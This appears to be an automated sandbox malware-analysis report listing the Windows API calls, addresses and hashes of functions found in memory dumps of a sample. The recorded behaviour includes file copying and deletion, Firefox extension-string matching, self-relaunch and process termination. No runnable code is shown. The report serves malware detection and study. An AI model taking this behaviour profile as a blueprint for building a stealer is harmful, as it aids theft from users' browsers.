• Instruction Fuzzy Hash: EAF062319802149BD722BBA85407BDD3BD09F00764FD001DAE414AA1D2DB3459C09799
APIs
• StrCmpCA.SHLWAPI(00000000,009062F0), ref: 0041079A
• StrCmpCA.SHLWAPI(00000000,00906230), ref: 00410866
• StrCmpCA.SHLWAPI(00000000,00906310), ref: 0041099D
  • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
Strings
Memory Dump Source
• Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
Yara matches
Similarity
• API ID: lstrcpy
• String ID: `_A
• API String ID: 3722407311-2339250863
• Opcode ID: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
• Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
• Opcode Fuzzy Hash: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
• Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86
APIs
• StrCmpCA.SHLWAPI(00000000,009062F0), ref: 0041079A
• StrCmpCA.SHLWAPI(00000000,00906230), ref: 00410866
• StrCmpCA.SHLWAPI(00000000,00906310), ref: 0041099D
  • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
Strings
Memory Dump Source
• Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
Yara matches
Similarity
• API ID: lstrcpy
• String ID: `_A
• API String ID: 3722407311-2339250863
• Opcode ID: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
• Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
• Opcode Fuzzy Hash: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
• Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
  • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
  • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
  • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
  • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
• ShellExecuteEx.SHELL32(0000003C), ref: 00416726
• ExitProcess.KERNEL32 ref: 00416755
Strings
Memory Dump Source
• Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
Yara matches
Similarity
• API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
• String ID: <
• API String ID: 1148417306-4251816714
• Opcode ID: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
• Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
• Opcode Fuzzy Hash: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
• Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00B168CA
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00B1698D
                                                                                  • ExitProcess.KERNEL32 ref: 00B169BC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
Yara matches
Similarity
• API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
• String ID: <
• API String ID: 1148417306-4251816714
• Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
• Instruction ID: 80c35550d7b299a721c39451d5aed42788afefcbc8336e202ec5522e1f9a8d66
• Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
• Instruction Fuzzy Hash: DA313CB1901218ABDB14EB90DD96FDEB7B9AF04300F8051D9F209A6191DF746B88CF5A
APIs
• VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F
Strings
Memory Dump Source
• Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
Yara matches
Similarity
• API ID: ProtectVirtual
• String ID: @Jn@$Jn@$Jn@
• API String ID: 544645111-1180188686
• Opcode ID: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
• Instruction ID: b746c2a28f05bbd6b1460d210bf7098c9bc173f160aa6dfc6dfdc57a011f18e7
• Opcode Fuzzy Hash: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
• Instruction Fuzzy Hash: FA213374E04208EFEB04CF84C544BAEBBB5FF48304F1181AAD54AAB381D3399A91DF85
APIs
• lstrcpy.KERNEL32(00000000,?), ref: 0041A972
• lstrcatA.KERNEL32(00000000), ref: 0041A982
Strings
Memory Dump Source
• Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
Yara matches
Similarity
• API ID: lstrcatlstrcpy
• String ID: vI@$vI@
• API String ID: 3905823039-1245421781
• Opcode ID: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
• Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
• Opcode Fuzzy Hash: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
• Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95
APIs
• GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
• HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
• wsprintfW.USER32 ref: 00418D78
Strings
Memory Dump Source
• Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
Yara matches
Similarity
• API ID: Heap$AllocProcesswsprintf
• String ID: %hs
• API String ID: 659108358-2783943728
• Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
• Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
• Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
• Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
APIs
  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
  • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
  • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
  • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
  • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
  • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008D4F10,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
  • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
  • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
• lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
• lstrlenA.KERNEL32(00000000), ref: 0040A6BC
  • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
  • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
• DeleteFileA.KERNEL32(00000000), ref: 0040A743
Memory Dump Source
• Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
Yara matches
Similarity
• API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
• String ID:
• API String ID: 257331557-0
• Opcode ID: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
• Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
• Opcode Fuzzy Hash: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
• Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
APIs
  • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
  • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
  • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
  • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
  • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
  • Part of subcall function 00B18DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B01660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B18DED
  • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
  • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B0A548
• lstrlen.KERNEL32(00000000,00000000), ref: 00B0A666
• lstrlen.KERNEL32(00000000), ref: 00B0A923
  • Part of subcall function 00B1AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B1AA4D
  • Part of subcall function 00B0A077: memcmp.MSVCRT(?,00421264,00000003), ref: 00B0A094
• DeleteFileA.KERNEL32(00000000), ref: 00B0A9AA
Memory Dump Source
• Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
Yara matches
Similarity
• API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
• String ID:
• API String ID: 257331557-0
• Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
• Instruction ID: 7799c5aca0d79057b331884402958aebb2758cb9bc97c4e34c29c50ff5db48f9
• Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
• Instruction Fuzzy Hash: 7EE1F3729112189BCB09FBA4DD92DEEB779AF14700F908199F11672091EF347B88CF62
APIs
  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
  • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
  • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
  • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
  • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
  • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008D4F10,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
  • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
  • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
• lstrlenA.KERNEL32(00000000), ref: 0040D698
• lstrlenA.KERNEL32(00000000), ref: 0040D6AC
• DeleteFileA.KERNEL32(00000000), ref: 0040D72B
Memory Dump Source
• Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
Yara matches
Similarity
• API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
• String ID:
• API String ID: 211194620-0
• Opcode ID: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
• Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
• Opcode Fuzzy Hash: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
• Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A
APIs
  • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
  • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
  • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
  • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
  • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
  • Part of subcall function 00B18DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B01660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B18DED
  • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
  • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B0D6E8
• lstrlen.KERNEL32(00000000), ref: 00B0D8FF
• lstrlen.KERNEL32(00000000), ref: 00B0D913
• DeleteFileA.KERNEL32(00000000), ref: 00B0D992
Memory Dump Source
• Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                  • String ID:
                                                                                  • API String ID: 211194620-0
                                                                                  • Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                                                                  • Instruction ID: 0ffce31078420dd1d32a7f7a32ccc86cbd37952896ecfb49572aa9625ba36c53
                                                                                  • Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                                                                  • Instruction Fuzzy Hash: C591FF729112089BCB18FBA4DD96DEE77B9AF54700F9041A9F10672091EF347B88CF62
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008D4F10,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040D99F
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040D9B3
                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                  • String ID:
                                                                                  • API String ID: 211194620-0
                                                                                  • Opcode ID: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                                                                                  • Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
                                                                                  • Opcode Fuzzy Hash: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                                                                                  • Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A
                                                                                  APIs
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                    • Part of subcall function 00B18DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B01660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B18DED
                                                                                    • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
                                                                                    • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B0DA68
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00B0DC06
                                                                                  • lstrlen.KERNEL32(00000000), ref: 00B0DC1A
                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00B0DC99
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                  • String ID:
                                                                                  • API String ID: 211194620-0
                                                                                  • Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                                                                  • Instruction ID: d1ae937bcbd25f36d592e033057c8e0396224b2fc52fd7edec31e9d597eb91eb
                                                                                  • Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                                                                  • Instruction Fuzzy Hash: 8481F3719112189BCB08FBE4DD96DEE77B9AF54700F9045ADF006A6091EF347B88CB62
                                                                                  APIs
                                                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                                                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                  • API String ID: 998311485-3310892237
                                                                                  • Opcode ID: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                                                                  • Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
                                                                                  • Opcode Fuzzy Hash: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                                                                  • Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 004194EB
                                                                                    • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                                                                    • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                                                                    • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                                                                                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004195D6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
